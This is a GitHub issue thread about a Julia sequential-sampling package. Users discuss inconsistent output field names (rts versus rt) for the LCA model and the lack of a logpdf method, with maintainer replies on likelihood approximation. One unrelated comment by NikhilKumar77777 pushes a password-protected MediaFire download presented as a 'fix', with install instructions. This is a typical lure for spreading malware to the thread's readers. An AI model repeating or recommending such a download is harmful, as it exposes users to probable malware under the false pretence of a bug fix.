### ISSUE TITLE
Consistency: LCA returns `rts=` instead of `rt`

### ISSUE THREAD

**Issue by DominiqueMakowski** [itsdfish/SequentialSamplingModels.jl#98]
```
julia> rand(LCA([1], 1, 0.2, 0.1, 1.5, 0.3), 10)
(choices = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1], rts = [2.778999999999838, 0.6690000000000003, 1.2750000000000008, 2.4109999999998784, 3.149999999999797, 2.1019999999999124, 1.5189999999999766, 1.523999999999976, 1.3499999999999952, 0.9130000000000005])

julia> rand(LBA([1], [1], 0.2, 0.1, 0.3), 10)
(choice = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1], rt = [0.402938041365759, 0.8596061373858541, 0.37103046264565165, 0.38653352395420326, 0.3904626069076711, 0.4038741281506709, 0.4272579397173325, 0.38691891068191664, 0.4127789906712775, 0.39767474091816174])
```

Most models return `rt`, LCA returns `rts`

Same for `choices`

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by itsdfish** [comment]
Good catch. A patch release will be available soon.

**Comment by DominiqueMakowski** [comment]
Also, is there no logpdf method for LCA? I tried to run it in  Turing but:

```
ERROR: MethodError: no method matching logpdf(::LCA{Float64}, ::Int64, ::Float64)

Closest candidates are:
  logpdf(::AbstractLNR, ::Int64, ::Float64)
   @ SequentialSamplingModels C:\Users\domma\.julia\packages\SequentialSamplingModels\KBt9U\src\LNR.jl:61
  logpdf(::AbstractLBA, ::Any, ::Any)
   @ SequentialSamplingModels C:\Users\domma\.julia\packages\SequentialSamplingModels\KBt9U\src\LBA.jl:100
  logpdf(::DDM, ::Any, ::Any; ϵ)
   @ SequentialSamplingModels C:\Users\domma\.julia\packages\SequentialSamplingModels\KBt9U\src\DDM.jl:127
  ...
```

**Comment by itsdfish** [comment]
No. Its a simulation-based model only. On thing you can do is simulate it about 10k to 100k times and approximate the pdf with a kernel density estimator. Differential Evolution is typically used to estimate parameters via maximum likelihood estimation or Bayesian parameter estimation. Be warned that it is very slow. The other option is to approximate the likelihood function with a neural network technique. That is something that I would like to do at some point, but for methods like BayesFlow, the implementation details are difficult (for me) to follow based on the paper and code.

**Comment by DominiqueMakowski** [comment]
Interesting, I had no idea

**Comment by itsdfish** [comment]
The reference Kiante provided is a good resource on the topic. The main finding is that many of the key parameters have poor estimation properties. In a bit a bad fate, non decision time can be estimated reliably. 

Miletić, S., Turner, B. M., Forstmann, B. U., & van Maanen, L. (2017). Parameter recovery for the Leaky Competing Accumulator model. Journal of Mathematical Psychology, 76(Part A), 25–50. [https://doi.org/10.1016/j.jmp.2016.12.001](https://psycnet.apa.org/doi/10.1016/j.jmp.2016.12.001)
